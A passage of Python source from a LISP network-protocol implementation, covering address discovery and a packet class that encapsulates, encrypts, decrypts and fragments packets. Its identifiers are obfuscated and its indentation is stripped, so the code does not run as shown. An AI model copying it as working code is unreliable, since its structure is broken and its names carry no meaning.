ooOOo [ 2 ] = OoO0o0OOOO
break
ooOo0O0 = ooOOo [ 0 ] . print_address_no_iid ( ) if ooOOo [ 0 ] else "none"
ooo0 = ooOOo [ 1 ] . print_address_no_iid ( ) if ooOOo [ 1 ] else "none"
OoO0o0OOOO = ooOOo [ 2 ] if ooOOo [ 2 ] else "none"
O0O0 = " (user selected)" if O0O0 != None else ""
ooOo0O0 = red ( ooOo0O0 , False )
ooo0 = red ( ooo0 , False )
OoO0o0OOOO = bold ( OoO0o0OOOO , False )
lprint ( "Local addresses are IPv4: {}, IPv6: {} from device {}{}, iid {}" . format ( ooOo0O0 , ooo0 , OoO0o0OOOO , O0O0 , IIi11iII11i1 ) )
lisp_myrlocs = ooOOo
return ( ( ooOOo [ 0 ] != None ) )
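#
# lisp_get_all_addresses
#
# Return every non-loopback, non-link-local IPv4 and IPv6 address
# configured on this system.
#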
def lisp_get_all_addresses ( ) :
i1ii111i = [ ]
for II1i in netifaces . interfaces ( ) :
try : i1ii1i1Ii11 = netifaces . ifaddresses ( II1i )
except : continue
if ( i1ii1i1Ii11 . has_key ( netifaces . AF_INET ) ) :
for o0o00O0oOooO0 in i1ii1i1Ii11 [ netifaces . AF_INET ] :
oO0OO = o0o00O0oOooO0 [ "addr" ]
if ( oO0OO . find ( "127.0.0.1" ) != - 1 ) : continue
i1ii111i . append ( oO0OO )
if ( i1ii1i1Ii11 . has_key ( netifaces . AF_INET6 ) ) :
for o0o00O0oOooO0 in i1ii1i1Ii11 [ netifaces . AF_INET6 ] :
oO0OO = o0o00O0oOooO0 [ "addr" ]
if ( oO0OO == "::1" ) : continue
if ( oO0OO [ 0 : 5 ] == "fe80:" ) : continue
i1ii111i . append ( oO0OO )
return ( i1ii111i )
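#
# lisp_get_all_multicast_rles
#
# Grep "rle-address =" lines from ./lisp.config and return the RLEs in the
# IPv4 multicast range 224.0.0.0 through 239.255.255.255.
#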
def lisp_get_all_multicast_rles ( ) :
I11iI1 = [ ]
II1IIiiI1 = commands . getoutput ( 'egrep "rle-address =" ./lisp.config' )
if ( II1IIiiI1 == "" ) : return ( I11iI1 )
Oo0o0ooOoO = II1IIiiI1 . split ( "\n" )
for oOOo0ooO0 in Oo0o0ooOoO :
if ( oOOo0ooO0 [ 0 ] == "#" ) : continue
iI1Ii11 = oOOo0ooO0 . split ( "rle-address = " ) [ 1 ]
Ooo0 = int ( iI1Ii11 . split ( "." ) [ 0 ] )
if ( Ooo0 >= 224 and Ooo0 < 240 ) : I11iI1 . append ( iI1Ii11 )
return ( I11iI1 )
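#
# lisp_packet
#
# Container for one data packet: the parsed outer IP, UDP, and LISP header
# fields plus the inner header fields, with methods to encode, encrypt,
# decrypt, fragment, and send the packet.
#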
class lisp_packet ( ) :
def __init__ ( self , packet ) :
self . outer_source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . outer_dest = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . outer_tos = 0
self . outer_ttl = 0
self . udp_sport = 0
self . udp_dport = 0
self . udp_length = 0
self . udp_checksum = 0
self . inner_source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . inner_dest = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . inner_tos = 0
self . inner_ttl = 0
self . inner_protocol = 0
self . inner_sport = 0
self . inner_dport = 0
self . lisp_header = lisp_data_header ( )
self . packet = packet
self . inner_version = 0
self . outer_version = 0
self . encap_port = LISP_DATA_PORT
self . inner_is_fragment = False
self . packet_error = ""
self . gleaned_dest = False
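    #
    # encode() prepends LISP, UDP, and outer IP headers to self.packet,
    # encrypting the inner packet first when a crypto key is configured for
    # the destination RLOC. Returns None when no outer source is set or the
    # outer version is unsupported; for an IPv6 outer header no IP header
    # is built here (the empty string leaves that to the sending socket).
    #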
def encode ( self , nonce ) :
if ( self . outer_source . is_null ( ) ) : return ( None )
if ( nonce == None ) :
self . lisp_header . nonce ( lisp_get_data_nonce ( ) )
elif ( self . lisp_header . is_request_nonce ( nonce ) ) :
self . lisp_header . request_nonce ( nonce )
else :
self . lisp_header . nonce ( nonce )
self . lisp_header . instance_id ( self . inner_dest . instance_id )
self . lisp_header . key_id ( 0 )
iiII1IIii1i1 = ( self . lisp_header . get_instance_id ( ) == 0xffffff )
if ( lisp_data_plane_security and iiII1IIii1i1 == False ) :
oo0o00OO = self . outer_dest . print_address_no_iid ( ) + ":" + str ( self . encap_port )
if ( lisp_crypto_keys_by_rloc_encap . has_key ( oo0o00OO ) ) :
iIi11III = lisp_crypto_keys_by_rloc_encap [ oo0o00OO ]
if ( iIi11III [ 1 ] ) :
iIi11III [ 1 ] . use_count += 1
IiiiIi1iiii11 , iIIi1IIIii11i = self . encrypt ( iIi11III [ 1 ] , oo0o00OO )
if ( iIIi1IIIii11i ) : self . packet = IiiiIi1iiii11
self . udp_checksum = 0
if ( self . encap_port == LISP_DATA_PORT ) :
if ( lisp_crypto_ephem_port == None ) :
if ( self . gleaned_dest ) :
self . udp_sport = LISP_DATA_PORT
else :
self . hash_packet ( )
else :
self . udp_sport = lisp_crypto_ephem_port
else :
self . udp_sport = LISP_DATA_PORT
self . udp_dport = self . encap_port
self . udp_length = len ( self . packet ) + 16
if ( self . outer_version == 4 ) :
oo0O = socket . htons ( self . udp_sport )
O0o0o0ooO0ooo = socket . htons ( self . udp_dport )
else :
oo0O = self . udp_sport
O0o0o0ooO0ooo = self . udp_dport
oOoO0OOO00O = struct . pack ( "HHHH" , oo0O , O0o0o0ooO0ooo , socket . htons ( self . udp_length ) ,
self . udp_checksum )
iI1iIIII1 = self . lisp_header . encode ( )
if ( self . outer_version == 4 ) :
i11111 = socket . htons ( self . udp_length + 20 )
o0o00OoOo0 = socket . htons ( 0x4000 )
oo0O0000O0 = struct . pack ( "BBHHHBBH" , 0x45 , self . outer_tos , i11111 , 0xdfdf ,
o0o00OoOo0 , self . outer_ttl , 17 , 0 )
oo0O0000O0 += self . outer_source . pack_address ( )
oo0O0000O0 += self . outer_dest . pack_address ( )
oo0O0000O0 = lisp_ip_checksum ( oo0O0000O0 )
elif ( self . outer_version == 6 ) :
oo0O0000O0 = ""
else :
return ( None )
self . packet = oo0O0000O0 + oOoO0OOO00O + iI1iIIII1 + self . packet
return ( self )
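    #
    # cipher_pad() right-pads the packet with spaces to the 16-byte AES
    # block size; for example, a 30-byte packet is padded to 32 bytes.
    #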
def cipher_pad ( self , packet ) :
oOOoO0O = len ( packet )
if ( ( oOOoO0O % 16 ) != 0 ) :
OoOoO = ( ( oOOoO0O / 16 ) + 1 ) * 16
packet = packet . ljust ( OoOoO )
return ( packet )
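    #
    # encrypt() pads the packet to the cipher block size, encrypts it with
    # the key's cipher suite (chacha20, AES-GCM, or AES-CBC), and appends
    # an ICV computed over the LISP header, IV, and ciphertext. Returns
    # [IV + ciphertext + ICV, True], or [self.packet, False] when no key is
    # available.
    #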
def encrypt ( self , key , addr_str ) :
if ( key == None or key . shared_key == None ) :
return ( [ self . packet , False ] )
IiiiIi1iiii11 = self . cipher_pad ( self . packet )
OO000OOOo0Oo = key . get_iv ( )
i1 = lisp_get_timestamp ( )
oOoOOoo = None
if ( key . cipher_suite == LISP_CS_25519_CHACHA ) :
Oo00O0o0O = chacha . ChaCha ( key . encrypt_key , OO000OOOo0Oo ) . encrypt
elif ( key . cipher_suite == LISP_CS_25519_GCM ) :
O0OoOO = binascii . unhexlify ( key . encrypt_key )
try :
o0o0oO0OOO = AES . new ( O0OoOO , AES . MODE_GCM , OO000OOOo0Oo )
Oo00O0o0O = o0o0oO0OOO . encrypt
oOoOOoo = o0o0oO0OOO . digest
except :
lprint ( "You need AES-GCM, do a 'pip install pycryptodome'" )
return ( [ self . packet , False ] )
else :
O0OoOO = binascii . unhexlify ( key . encrypt_key )
Oo00O0o0O = AES . new ( O0OoOO , AES . MODE_CBC , OO000OOOo0Oo ) . encrypt
o0OoOo0o0O00 = Oo00O0o0O ( IiiiIi1iiii11 )
if ( o0OoOo0o0O00 == None ) : return ( [ self . packet , False ] )
i1 = int ( str ( time . time ( ) - i1 ) . split ( "." ) [ 1 ] [ 0 : 6 ] )
if ( oOoOOoo != None ) : o0OoOo0o0O00 += oOoOOoo ( )
self . lisp_header . key_id ( key . key_id )
iI1iIIII1 = self . lisp_header . encode ( )
Oo00oo0 = key . do_icv ( iI1iIIII1 + OO000OOOo0Oo + o0OoOo0o0O00 , OO000OOOo0Oo )
iI1oOoo = 4 if ( key . do_poly ) else 8
O0ooo = bold ( "Encrypt" , False )
IiIIiII1I = bold ( key . cipher_suite_string , False )
addr_str = "RLOC: " + red ( addr_str , False )
o00oOOo0Oo = "poly" if key . do_poly else "sha256"
o00oOOo0Oo = bold ( o00oOOo0Oo , False )
Oooo0o0oO = "ICV({}): 0x{}...{}" . format ( o00oOOo0Oo , Oo00oo0 [ 0 : iI1oOoo ] , Oo00oo0 [ - iI1oOoo : : ] )
dprint ( "{} for key-id: {}, {}, {}, {}-time: {} usec" . format ( O0ooo , key . key_id , addr_str , Oooo0o0oO , IiIIiII1I , i1 ) )
Oo00oo0 = int ( Oo00oo0 , 16 )
if ( key . do_poly ) :
iI1IiiiIi = byte_swap_64 ( ( Oo00oo0 >> 64 ) & LISP_8_64_MASK )
IiI111 = byte_swap_64 ( Oo00oo0 & LISP_8_64_MASK )
Oo00oo0 = struct . pack ( "QQ" , iI1IiiiIi , IiI111 )
else :
iI1IiiiIi = byte_swap_64 ( ( Oo00oo0 >> 96 ) & LISP_8_64_MASK )
IiI111 = byte_swap_64 ( ( Oo00oo0 >> 32 ) & LISP_8_64_MASK )
OO0OO00ooO0 = socket . htonl ( Oo00oo0 & 0xffffffff )
Oo00oo0 = struct . pack ( "QQI" , iI1IiiiIi , IiI111 , OO0OO00ooO0 )
return ( [ OO000OOOo0Oo + o0OoOo0o0O00 + Oo00oo0 , True ] )
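    #
    # decrypt() splits off and verifies the trailing ICV (poly1305 or
    # sha256 based), then decrypts the remainder with the key's cipher
    # suite. Returns [plaintext, True] on success and [None, False] on any
    # ICV or decrypt failure.
    #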
def decrypt ( self , packet , header_length , key , addr_str ) :
if ( key . do_poly ) :
iI1IiiiIi , IiI111 = struct . unpack ( "QQ" , packet [ - 16 : : ] )
o0O0OOOo0 = byte_swap_64 ( iI1IiiiIi ) << 64
o0O0OOOo0 |= byte_swap_64 ( IiI111 )
o0O0OOOo0 = lisp_hex_string ( o0O0OOOo0 ) . zfill ( 32 )
packet = packet [ 0 : - 16 ]
iI1oOoo = 4
I1ii1i = bold ( "poly" , False )
else :
iI1IiiiIi , IiI111 , OO0OO00ooO0 = struct . unpack ( "QQI" , packet [ - 20 : : ] )
o0O0OOOo0 = byte_swap_64 ( iI1IiiiIi ) << 96
o0O0OOOo0 |= byte_swap_64 ( IiI111 ) << 32
o0O0OOOo0 |= socket . htonl ( OO0OO00ooO0 )
o0O0OOOo0 = lisp_hex_string ( o0O0OOOo0 ) . zfill ( 40 )
packet = packet [ 0 : - 20 ]
iI1oOoo = 8
I1ii1i = bold ( "sha" , False )
iI1iIIII1 = self . lisp_header . encode ( )
if ( key . cipher_suite == LISP_CS_25519_CHACHA ) :
Iii = 8
IiIIiII1I = bold ( "chacha" , False )
elif ( key . cipher_suite == LISP_CS_25519_GCM ) :
Iii = 12
IiIIiII1I = bold ( "aes-gcm" , False )
else :
Iii = 16
IiIIiII1I = bold ( "aes-cbc" , False )
OO000OOOo0Oo = packet [ 0 : Iii ]
Oo0OOOOOOO0oo = key . do_icv ( iI1iIIII1 + packet , OO000OOOo0Oo )
I1iIIIiiii = "0x{}...{}" . format ( o0O0OOOo0 [ 0 : iI1oOoo ] , o0O0OOOo0 [ - iI1oOoo : : ] )
I1111 = "0x{}...{}" . format ( Oo0OOOOOOO0oo [ 0 : iI1oOoo ] , Oo0OOOOOOO0oo [ - iI1oOoo : : ] )
if ( Oo0OOOOOOO0oo != o0O0OOOo0 ) :
self . packet_error = "ICV-error"
O0Oo0oo0O0O0o = IiIIiII1I + "/" + I1ii1i
IIIi111iIi11 = bold ( "ICV failed ({})" . format ( O0Oo0oo0O0O0o ) , False )
Oooo0o0oO = "packet-ICV {} != computed-ICV {}" . format ( I1iIIIiiii , I1111 )
dprint ( ( "{} from RLOC {}, receive-port: {}, key-id: {}, " + "packet dropped, {}" ) . format ( IIIi111iIi11 , red ( addr_str , False ) ,
self . udp_sport , key . key_id , Oooo0o0oO ) )
dprint ( "{}" . format ( key . print_keys ( ) ) )
lisp_retry_decap_keys ( addr_str , iI1iIIII1 + packet , OO000OOOo0Oo , o0O0OOOo0 )
return ( [ None , False ] )
packet = packet [ Iii : : ]
i1 = lisp_get_timestamp ( )
if ( key . cipher_suite == LISP_CS_25519_CHACHA ) :
OOOOooO0 = chacha . ChaCha ( key . encrypt_key , OO000OOOo0Oo ) . decrypt
elif ( key . cipher_suite == LISP_CS_25519_GCM ) :
O0OoOO = binascii . unhexlify ( key . encrypt_key )
try :
OOOOooO0 = AES . new ( O0OoOO , AES . MODE_GCM , OO000OOOo0Oo ) . decrypt
except :
self . packet_error = "no-decrypt-key"
lprint ( "You need AES-GCM, do a 'pip install pycryptodome'" )
return ( [ None , False ] )
else :
if ( ( len ( packet ) % 16 ) != 0 ) :
dprint ( "Ciphertext not multiple of 16 bytes, packet dropped" )
return ( [ None , False ] )
O0OoOO = binascii . unhexlify ( key . encrypt_key )
OOOOooO0 = AES . new ( O0OoOO , AES . MODE_CBC , OO000OOOo0Oo ) . decrypt
i1o0 = OOOOooO0 ( packet )
i1 = int ( str ( time . time ( ) - i1 ) . split ( "." ) [ 1 ] [ 0 : 6 ] )
O0ooo = bold ( "Decrypt" , False )
addr_str = "RLOC: " + red ( addr_str , False )
o00oOOo0Oo = "poly" if key . do_poly else "sha256"
o00oOOo0Oo = bold ( o00oOOo0Oo , False )
Oooo0o0oO = "ICV({}): {}" . format ( o00oOOo0Oo , I1iIIIiiii )
dprint ( "{} for key-id: {}, {}, {} (good), {}-time: {} usec" . format ( O0ooo , key . key_id , addr_str , Oooo0o0oO , IiIIiII1I , i1 ) )
self . packet = self . packet [ 0 : header_length ]
return ( [ i1o0 , True ] )
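    #
    # fragment_outer() splits an encapsulated packet into 1000-byte pieces
    # and builds an outer IPv4 fragment header (offset and more-fragments
    # bit) for each piece.
    #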
def fragment_outer ( self , outer_hdr , inner_packet ) :
OOoOoO = 1000
iI1i1Ii111I = [ ]
oO0ooOoO = 0
oOOoO0O = len ( inner_packet )
while ( oO0ooOoO < oOOoO0O ) :
o0o00OoOo0 = inner_packet [ oO0ooOoO : : ]
if ( len ( o0o00OoOo0 ) > OOoOoO ) : o0o00OoOo0 = o0o00OoOo0 [ 0 : OOoOoO ]
iI1i1Ii111I . append ( o0o00OoOo0 )
oO0ooOoO += len ( o0o00OoOo0 )
OoiiI11111II = [ ]
oO0ooOoO = 0
for o0o00OoOo0 in iI1i1Ii111I :
Ooi1IIii1i = oO0ooOoO if ( o0o00OoOo0 == iI1i1Ii111I [ - 1 ] ) else 0x2000 + oO0ooOoO
Ooi1IIii1i = socket . htons ( Ooi1IIii1i )
outer_hdr = outer_hdr [ 0 : 6 ] + struct . pack ( "H" , Ooi1IIii1i ) + outer_hdr [ 8 : : ]
IIi1I1 = socket . htons ( len ( o0o00OoOo0 ) + 20 )
outer_hdr = outer_hdr [ 0 : 2 ] + struct . pack ( "H" , IIi1I1 ) + outer_hdr [ 4 : : ]
outer_hdr = lisp_ip_checksum ( outer_hdr )
OoiiI11111II . append ( outer_hdr + o0o00OoOo0 )
oO0ooOoO += len ( o0o00OoOo0 ) / 8
return ( OoiiI11111II )
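    #
    # send_icmp_too_big() sends an ICMP Destination Unreachable,
    # Fragmentation Needed (type 3, code 4) message advertising an MTU of
    # 1400 to the inner source, rate-limited by
    # LISP_ICMP_TOO_BIG_RATE_LIMIT.
    #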
def send_icmp_too_big ( self , inner_packet ) :
global lisp_last_icmp_too_big_sent
global lisp_icmp_raw_socket
Ooo0o0oo0 = time . time ( ) - lisp_last_icmp_too_big_sent
if ( Ooo0o0oo0 < LISP_ICMP_TOO_BIG_RATE_LIMIT ) :
lprint ( "Rate limit sending ICMP Too-Big to {}" . format ( self . inner_source . print_address_no_iid ( ) ) )
return ( False )
I1iiII = socket . htons ( 1400 )
i111i1I1ii1i = struct . pack ( "BBHHH" , 3 , 4 , 0 , 0 , I1iiII )
i111i1I1ii1i += inner_packet [ 0 : 20 + 8 ]
i111i1I1ii1i = lisp_icmp_checksum ( i111i1I1ii1i )
o0Oo0oO00Oooo = inner_packet [ 12 : 16 ]
Ii1II1I11i1I = self . inner_source . print_address_no_iid ( )
OOoOo = self . outer_source . pack_address ( )
i11111 = socket . htons ( 20 + 36 )
ooooo0Oo0 = struct . pack ( "BBHHHBBH" , 0x45 , 0 , i11111 , 0 , 0 , 32 , 1 , 0 ) + OOoOo + o0Oo0oO00Oooo
ooooo0Oo0 = lisp_ip_checksum ( ooooo0Oo0 )
ooooo0Oo0 = self . fix_outer_header ( ooooo0Oo0 )
ooooo0Oo0 += i111i1I1ii1i
IIi11 = bold ( "Too-Big" , False )
lprint ( "Send ICMP {} to {}, mtu 1400: {}" . format ( IIi11 , Ii1II1I11i1I ,
lisp_format_packet ( ooooo0Oo0 ) ) )
try :
lisp_icmp_raw_socket . sendto ( ooooo0Oo0 , ( Ii1II1I11i1I , 0 ) )
except socket . error , iIIi1iI1I1IIi :
lprint ( "lisp_icmp_raw_socket.sendto() failed: {}" . format ( iIIi1iI1I1IIi ) )
return ( False )
lisp_last_icmp_too_big_sent = lisp_get_timestamp ( )
return ( True )
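    #
    # fragment() returns a list of packets no larger than 1500 bytes. An
    # IPv6 inner packet is fragmented at the outer IPv4 header; an IPv4
    # inner packet is fragmented at the inner header, honoring the DF bit
    # (with ICMP Too-Big) unless lisp_ignore_df_bit is set.
    #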
def fragment ( self ) :
global lisp_icmp_raw_socket
global lisp_ignore_df_bit
IiiiIi1iiii11 = self . fix_outer_header ( self . packet )
oOOoO0O = len ( IiiiIi1iiii11 )
if ( oOOoO0O <= 1500 ) : return ( [ IiiiIi1iiii11 ] , "Fragment-None" )
IiiiIi1iiii11 = self . packet
if ( self . inner_version != 4 ) :
iIiIi1i1Iiii = random . randint ( 0 , 0xffff )
OOO00000O = IiiiIi1iiii11 [ 0 : 4 ] + struct . pack ( "H" , iIiIi1i1Iiii ) + IiiiIi1iiii11 [ 6 : 20 ]
iIiiiII11 = IiiiIi1iiii11 [ 20 : : ]
OoiiI11111II = self . fragment_outer ( OOO00000O , iIiiiII11 )
return ( OoiiI11111II , "Fragment-Outer" )
iiIII1i1 = 56 if ( self . outer_version == 6 ) else 36
OOO00000O = IiiiIi1iiii11 [ 0 : iiIII1i1 ]
oOOo0OOoOO0 = IiiiIi1iiii11 [ iiIII1i1 : iiIII1i1 + 20 ]
iIiiiII11 = IiiiIi1iiii11 [ iiIII1i1 + 20 : : ]
IIII1I1 = struct . unpack ( "H" , oOOo0OOoOO0 [ 6 : 8 ] ) [ 0 ]
IIII1I1 = socket . ntohs ( IIII1I1 )
if ( IIII1I1 & 0x4000 ) :
if ( lisp_icmp_raw_socket != None ) :
I1i1i1iIi1iIi = IiiiIi1iiii11 [ iiIII1i1 : : ]
if ( self . send_icmp_too_big ( I1i1i1iIi1iIi ) ) : return ( [ ] , None )
if ( lisp_ignore_df_bit ) :
IIII1I1 &= ~ 0x4000
else :
o00OoOOoO = bold ( "DF-bit set" , False )
dprint ( "{} in inner header, packet discarded" . format ( o00OoOOoO ) )
return ( [ ] , "Fragment-None-DF-bit" )
oO0ooOoO = 0
oOOoO0O = len ( iIiiiII11 )
OoiiI11111II = [ ]
while ( oO0ooOoO < oOOoO0O ) :
OoiiI11111II . append ( iIiiiII11 [ oO0ooOoO : oO0ooOoO + 1400 ] )
oO0ooOoO += 1400
iI1i1Ii111I = OoiiI11111II
OoiiI11111II = [ ]
o00OoOo0 = True if IIII1I1 & 0x2000 else False
IIII1I1 = ( IIII1I1 & 0x1fff ) * 8
for o0o00OoOo0 in iI1i1Ii111I :
O0oooooO = IIII1I1 / 8
if ( o00OoOo0 ) :
O0oooooO |= 0x2000
elif ( o0o00OoOo0 != iI1i1Ii111I [ - 1 ] ) :
O0oooooO |= 0x2000
O0oooooO = socket . htons ( O0oooooO )
oOOo0OOoOO0 = oOOo0OOoOO0 [ 0 : 6 ] + struct . pack ( "H" , O0oooooO ) + oOOo0OOoOO0 [ 8 : : ]
oOOoO0O = len ( o0o00OoOo0 )
IIII1I1 += oOOoO0O
IIi1I1 = socket . htons ( oOOoO0O + 20 )
oOOo0OOoOO0 = oOOo0OOoOO0 [ 0 : 2 ] + struct . pack ( "H" , IIi1I1 ) + oOOo0OOoOO0 [ 4 : 10 ] + struct . pack ( "H" , 0 ) + oOOo0OOoOO0 [ 12 : : ]
oOOo0OOoOO0 = lisp_ip_checksum ( oOOo0OOoOO0 )
O0oo = oOOo0OOoOO0 + o0o00OoOo0
oOOoO0O = len ( O0oo )
if ( self . outer_version == 4 ) :
IIi1I1 = oOOoO0O + iiIII1i1
oOOoO0O += 16
OOO00000O = OOO00000O [ 0 : 2 ] + struct . pack ( "H" , IIi1I1 ) + OOO00000O [ 4 : : ]
OOO00000O = lisp_ip_checksum ( OOO00000O )
O0oo = OOO00000O + O0oo
O0oo = self . fix_outer_header ( O0oo )
oOOOO = iiIII1i1 - 12
IIi1I1 = socket . htons ( oOOoO0O )
O0oo = O0oo [ 0 : oOOOO ] + struct . pack ( "H" , IIi1I1 ) + O0oo [ oOOOO + 2 : : ]
OoiiI11111II . append ( O0oo )
return ( OoiiI11111II , "Fragment-Inner" )
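    #
    # fix_outer_header() puts the IPv4 total-length and fragment fields in
    # the byte order the sending raw socket expects: macOS swaps both
    # fields, other platforms only the length.
    #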
def fix_outer_header ( self , packet ) :
if ( self . outer_version == 4 or self . inner_version == 4 ) :
if ( lisp_is_macos ( ) ) :
packet = packet [ 0 : 2 ] + packet [ 3 ] + packet [ 2 ] + packet [ 4 : 6 ] + packet [ 7 ] + packet [ 6 ] + packet [ 8 : : ]
else :
packet = packet [ 0 : 2 ] + packet [ 3 ] + packet [ 2 ] + packet [ 4 : : ]
return ( packet )
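    #
    # send_packet() fragments when needed and sends each piece to the
    # destination RLOC over the supplied raw socket, logging the flow when
    # flow-logging is enabled.
    #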
def send_packet ( self , lisp_raw_socket , dest ) :
if ( lisp_flow_logging and dest != self . inner_dest ) : self . log_flow ( True )
dest = dest . print_address_no_iid ( )
OoiiI11111II , iiIIIi11I1I = self . fragment ( )
for O0oo in OoiiI11111II :
if ( len ( OoiiI11111II ) != 1 ) :
self . packet = O0oo
self . print_packet ( iiIIIi11I1I , True )
try : lisp_raw_socket . sendto ( O0oo , ( dest , 0 ) )
except socket . error , iIIi1iI1I1IIi :
lprint ( "socket.sendto() failed: {}" . format ( iIIi1iI1I1IIi ) )
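    #
    # send_l2_packet() prepends the supplied MAC header and writes the
    # frame to a layer-2 socket; used for IPv6 packets that cannot be sent
    # on a raw IP socket.
    #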
def send_l2_packet ( self , l2_socket , mac_header ) :
if ( l2_socket == None ) :
lprint ( "No layer-2 socket, drop IPv6 packet" )
return
if ( mac_header == None ) :
lprint ( "Could not build MAC header, drop IPv6 packet" )
return
IiiiIi1iiii11 = mac_header + self . packet
l2_socket . write ( IiiiIi1iiii11 )
return
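    #
    # bridge_l2_packet() looks up the dynamic-EID entry for the destination
    # and bridges the frame out that interface's bridge socket.
    #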
def bridge_l2_packet ( self , eid , db ) :
try : OO0oOo = db . dynamic_eids [ eid . print_address_no_iid ( ) ]
except : return
try : II1i = lisp_myinterfaces [ OO0oOo . interface ]
except : return
try :
socket = II1i . get_bridge_socket ( )
if ( socket == None ) : return
except : return
try : socket . send ( self . packet )
except socket . error , iIIi1iI1I1IIi :
lprint ( "bridge_l2_packet(): socket.send() failed: {}" . format ( iIIi1iI1I1IIi ) )
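    #
    # is_lisp_packet() returns True when the IPv4 packet is UDP and its
    # source or destination port is the LISP data port.
    #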
def is_lisp_packet ( self , packet ) :
oOoO0OOO00O = ( struct . unpack ( "B" , packet [ 9 ] ) [ 0 ] == LISP_UDP_PROTOCOL )
if ( oOoO0OOO00O == False ) : return ( False )
Oo0o = struct . unpack ( "H" , packet [ 22 : 24 ] ) [ 0 ]
if ( socket . ntohs ( Oo0o ) == LISP_DATA_PORT ) : return ( True )
Oo0o = struct . unpack ( "H" , packet [ 20 : 22 ] ) [ 0 ]
if ( socket . ntohs ( Oo0o ) == LISP_DATA_PORT ) : return ( True )
return ( False )
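    #
    # decode() parses and verifies the outer IP header, the UDP header, and
    # the LISP header, decrypts the payload when the LISP key-id bits are
    # set, then parses the inner IPv4, IPv6, or MAC header. Returns self on
    # success and None on any error, bumping the supplied stats counters.
    #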
def decode ( self , is_lisp_packet , lisp_ipc_socket , stats ) :
self . packet_error = ""
IiiiIi1iiii11 = self . packet
i1iI = len ( IiiiIi1iiii11 )
I1111iIIiIIII = oOo0O = True
OoI1 = 0
IiIIi11i111 = 0
if ( is_lisp_packet ) :
IiIIi11i111 = self . lisp_header . get_instance_id ( )
Iii11111I1iii = struct . unpack ( "B" , IiiiIi1iiii11 [ 0 : 1 ] ) [ 0 ]
self . outer_version = Iii11111I1iii >> 4
if ( self . outer_version == 4 ) :
oOoOo00oo = struct . unpack ( "H" , IiiiIi1iiii11 [ 10 : 12 ] ) [ 0 ]
IiiiIi1iiii11 = lisp_ip_checksum ( IiiiIi1iiii11 )
oO0oOoo0O = struct . unpack ( "H" , IiiiIi1iiii11 [ 10 : 12 ] ) [ 0 ]
if ( oO0oOoo0O != 0 ) :
if ( oOoOo00oo != 0 or lisp_is_macos ( ) == False ) :
self . packet_error = "checksum-error"
if ( stats ) :
stats [ self . packet_error ] . increment ( i1iI )
lprint ( "IPv4 header checksum failed for outer header" )
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( None )
IiiiII = LISP_AFI_IPV4
oO0ooOoO = 12
self . outer_tos = struct . unpack ( "B" , IiiiIi1iiii11 [ 1 : 2 ] ) [ 0 ]
self . outer_ttl = struct . unpack ( "B" , IiiiIi1iiii11 [ 8 : 9 ] ) [ 0 ]
OoI1 = 20
elif ( self . outer_version == 6 ) :
IiiiII = LISP_AFI_IPV6
oO0ooOoO = 8
OoO = struct . unpack ( "H" , IiiiIi1iiii11 [ 0 : 2 ] ) [ 0 ]
self . outer_tos = ( socket . ntohs ( OoO ) >> 4 ) & 0xff
self . outer_ttl = struct . unpack ( "B" , IiiiIi1iiii11 [ 7 : 8 ] ) [ 0 ]
OoI1 = 40
else :
self . packet_error = "outer-header-error"
if ( stats ) : stats [ self . packet_error ] . increment ( i1iI )
lprint ( "Cannot decode outer header" )
return ( None )
self . outer_source . afi = IiiiII
self . outer_dest . afi = IiiiII
IiIi11 = self . outer_source . addr_length ( )
self . outer_source . unpack_address ( IiiiIi1iiii11 [ oO0ooOoO : oO0ooOoO + IiIi11 ] )
oO0ooOoO += IiIi11
self . outer_dest . unpack_address ( IiiiIi1iiii11 [ oO0ooOoO : oO0ooOoO + IiIi11 ] )
IiiiIi1iiii11 = IiiiIi1iiii11 [ OoI1 : : ]
self . outer_source . mask_len = self . outer_source . host_mask_len ( )
self . outer_dest . mask_len = self . outer_dest . host_mask_len ( )
ii11IiiIi = struct . unpack ( "H" , IiiiIi1iiii11 [ 0 : 2 ] ) [ 0 ]
self . udp_sport = socket . ntohs ( ii11IiiIi )
ii11IiiIi = struct . unpack ( "H" , IiiiIi1iiii11 [ 2 : 4 ] ) [ 0 ]
self . udp_dport = socket . ntohs ( ii11IiiIi )
ii11IiiIi = struct . unpack ( "H" , IiiiIi1iiii11 [ 4 : 6 ] ) [ 0 ]
self . udp_length = socket . ntohs ( ii11IiiIi )
ii11IiiIi = struct . unpack ( "H" , IiiiIi1iiii11 [ 6 : 8 ] ) [ 0 ]
self . udp_checksum = socket . ntohs ( ii11IiiIi )
IiiiIi1iiii11 = IiiiIi1iiii11 [ 8 : : ]
I1111iIIiIIII = ( self . udp_dport == LISP_DATA_PORT or
self . udp_sport == LISP_DATA_PORT )
oOo0O = ( self . udp_dport in ( LISP_L2_DATA_PORT , LISP_VXLAN_DATA_PORT ) )
if ( self . lisp_header . decode ( IiiiIi1iiii11 ) == False ) :
self . packet_error = "lisp-header-error"
if ( stats ) : stats [ self . packet_error ] . increment ( i1iI )
if ( lisp_flow_logging ) : self . log_flow ( False )
lprint ( "Cannot decode LISP header" )
return ( None )
IiiiIi1iiii11 = IiiiIi1iiii11 [ 8 : : ]
IiIIi11i111 = self . lisp_header . get_instance_id ( )
OoI1 += 16
if ( IiIIi11i111 == 0xffffff ) : IiIIi11i111 = 0
i1I111II11 = False
o00oO = self . lisp_header . k_bits
if ( o00oO ) :
oo0o00OO = lisp_get_crypto_decap_lookup_key ( self . outer_source ,
self . udp_sport )
if ( oo0o00OO == None ) :
self . packet_error = "no-decrypt-key"
if ( stats ) : stats [ self . packet_error ] . increment ( i1iI )
self . print_packet ( "Receive" , is_lisp_packet )
Ooo00OoO0O00 = bold ( "No key available" , False )
dprint ( "{} for key-id {} to decrypt packet" . format ( Ooo00OoO0O00 , o00oO ) )
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( None )
o0Oo = lisp_crypto_keys_by_rloc_decap [ oo0o00OO ] [ o00oO ]
if ( o0Oo == None ) :
self . packet_error = "no-decrypt-key"
if ( stats ) : stats [ self . packet_error ] . increment ( i1iI )
self . print_packet ( "Receive" , is_lisp_packet )
Ooo00OoO0O00 = bold ( "No key available" , False )
dprint ( "{} to decrypt packet from RLOC {}" . format ( Ooo00OoO0O00 ,
red ( oo0o00OO , False ) ) )
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( None )
o0Oo . use_count += 1
